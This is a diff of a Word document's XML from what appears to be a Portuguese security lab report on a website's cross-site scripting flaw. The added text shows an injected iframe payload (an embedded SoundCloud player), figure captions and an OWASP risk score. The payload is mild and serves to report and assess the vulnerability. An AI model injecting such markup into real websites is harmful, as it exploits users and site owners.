-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t>Figura</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t>Resultado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da query</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
@@ -10107,8 +10136,7 @@
           <w:numId w:val="15"/>
         </w:numPr>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -10117,11 +10145,220 @@
           <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
+        <w:t xml:space="preserve">Na figura 11 encontra-se o resultado da injeção do </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>width</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>="100%"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>height</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">="166" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>scrolling</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">="no" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>frameborder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">="no" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>allow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>autoplay</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>ks/771984076"&gt;&lt;/iframe&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13B61141" wp14:editId="6AB5D0E5">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D0309B" wp14:editId="08717747">
             <wp:extent cx="5400040" cy="1651000"/>
-            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:effectExtent l="19050" t="19050" r="10160" b="25400"/>
             <wp:docPr id="1639545981" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -10147,6 +10384,11 @@
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -10157,11 +10399,89 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>11</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Resultado da injeção d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10403,22 +10723,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-BR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -10433,14 +10737,62 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>A vulnerabilidade de XSS já é bastante reconhecida e já existem bastantes ferramentas no mercado que ajudam a prevenir a mesma, os impactos causados numa aplicação real seriam devastadores para o quão simples um malfeitor é capaz de utilizar a vulnerabilidade exposta neste website. Outros casos reais causaram impactos de grande risco à empresa devido à sensibilidade dos dados que foram expostos.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Na figura 12 encontra-se o seu resultado utilizando a calculador de risco </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:lang w:val="pt-BR"/>
+          </w:rPr>
+          <w:t>https://javierolmedo.github.io/OWASP-Calculator/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7205415E" wp14:editId="15157DD0">
-            <wp:extent cx="5400040" cy="3752850"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="615AAFCD" wp14:editId="16762960">
+            <wp:extent cx="4595970" cy="3194050"/>
+            <wp:effectExtent l="19050" t="19050" r="14605" b="25400"/>
             <wp:docPr id="1966109280" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -10453,7 +10805,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10461,11 +10813,16 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5400040" cy="3752850"/>
+                      <a:ext cx="4607707" cy="3202207"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -10473,16 +10830,106 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
         </w:rPr>
-        <w:t>A vulnerabilidade de XSS já é bastante reconhecida e já existem bastantes ferramentas no mercado que ajudam a prevenir a mesma, os impactos causados numa aplicação real seriam devastadores para o quão simples um malfeitor é capaz de utilizar a vulnerabilidade exposta neste website. Outros casos reais causaram impactos de grande risco à empresa devido à sensibilidade dos dados que foram expostos.</w:t>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t>Figura</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - Score </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+        </w:rPr>
+        <w:t>vulnerabilidade</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId22"/>
+      <w:headerReference w:type="default" r:id="rId23"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
